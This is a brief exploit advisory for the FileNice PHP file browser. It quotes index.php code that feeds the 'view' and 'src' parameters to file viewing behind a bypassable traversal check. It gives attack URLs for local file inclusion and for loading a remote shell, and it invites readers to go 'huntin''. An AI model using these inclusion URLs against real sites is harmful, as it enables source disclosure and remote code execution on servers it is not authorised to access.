FileNice file browser RFI&LFI By: e.wiZz! #######Script site: http://filenice.com In the wild... ################################### ######Vulnerability: index.php ... if(isset($_GET['view'])){ if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){ $out = new FNOutput; $out->viewFile($_GET['view']); }else{ // someone is poking around where they shouldn't be echo("Don't hack my shit yo."); exit; } }else if(isset($_GET['src'])){ if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){ $out = new FNOutput; $out->showSource($_GET['src']); }else{ // someone is poking around where they shouldn't be echo("Don't hack my shit yo."); exit; } ... here is some security check for dir-traversal(can be bypassed),but there is no check for RFI, also you can see source of any file which is in parent directory: http://inthewild/path/index.php?src=[lfi] // index.php or whatever http://inthewild/path/index.php?src=[remote shell] btw. there is lot of other vulnerabilities...happy huntin' :)